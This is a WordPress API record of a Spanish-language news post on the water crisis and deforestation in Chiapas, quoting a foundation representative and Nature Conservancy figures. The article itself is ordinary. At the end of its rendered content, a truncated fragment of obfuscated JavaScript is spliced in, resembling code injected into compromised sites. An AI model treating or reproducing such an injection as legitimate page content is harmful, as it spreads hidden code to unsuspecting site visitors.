{"id":11327,"date":"2023-08-14T02:28:56","date_gmt":"2023-08-14T02:28:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11327"},"modified":"2023-08-14T02:28:57","modified_gmt":"2023-08-14T02:28:57","slug":"ya-se-resiente-la-falta-de-agua-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11327","title":{"rendered":"Ya se resiente la falta de agua en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"11328\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691980090391-1024x768.jpg\" alt=\"\" class=\"wp-image-11328\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691980090391-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691980090391-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691980090391-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691980090391.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Rodolfo Flores. 13 de agosto del 2023. de agosto del 2023. Tuxtla Guti\u00e9rrez.- Ericka Ram\u00edrez, de la Fundaci\u00f3n C\u00e1ntaro Azul, dio a conocer que,  la crisis h\u00eddrica, en el estado de Chiapas  ya no es la excepci\u00f3n sobre todo ante un aumento de producci\u00f3n y de consumo que han generado una fuerte deforestaci\u00f3n en la entidad.   Expuso que,  el calentamiento global se ha acrecentado tanto, que es un tema central en las mesas de trabajo a nivel internacional con acuerdos entre naciones y Estados para mitigar sus efectos. Record\u00f3 que recientemente en la Organizaci\u00f3n de las Naciones Unidas (ONU) se alerto que la era del calentamiento global ha terminado, ahora es el momento de la era de la ebullici\u00f3n global, esto, \u201cen el contexto de que julio se registraba como el mes m\u00e1s caluroso jam\u00e1s registrado en el planeta\u201d.De acuerdo con The Nature Conservancy (NTC), en su documento \u201cTransitando hacia la sustentabilidad en el territorio Chiapaneco: Visi\u00f3n 2030\u201d da cuenta de que Chiapas es el segundo estado con mayor deforestaci\u00f3n en el pa\u00eds.Ram\u00edrez detalla que este documento da cuenta que la principal causa de la deforestaci\u00f3n en Chiapas son la ganader\u00eda y la agricultura. Pues tan solo entre 2001 y 2016 se perdieron 470 mil hect\u00e1reas de cobertura forestal, con una tendencia al alza.Adem\u00e1s, Chiapas es el tercer productor de ganado m\u00e1s importante del pa\u00eds y la ganader\u00eda actualmente ocupa casi 3 millones de hect\u00e1reas o el 33 % de la superficie del estado. El problema es la forma de la producci\u00f3n pues el 90 % de las unidades ganaderas son extensivas, actividad de gran impacto ambiental, contribuye a la deforestaci\u00f3n, degradaci\u00f3n de suelos y p\u00e9rdida de la biodiversidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 13 de agosto del 2023. de agosto del 2023. Tuxtla Guti\u00e9rrez.- Ericka Ram\u00edrez, de la Fundaci\u00f3n C\u00e1ntaro Azul, dio a conocer que, la crisis h\u00eddrica, en el estado de Chiapas ya no es la excepci\u00f3n sobre todo ante un aumento de producci\u00f3n y de consumo que han generado una fuerte deforestaci\u00f3n en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11328,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11327","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11327","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11327"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11327\/revisions"}],"predecessor-version":[{"id":11329,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11327\/revisions\/11329"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11328"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11327"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11327"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11327"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}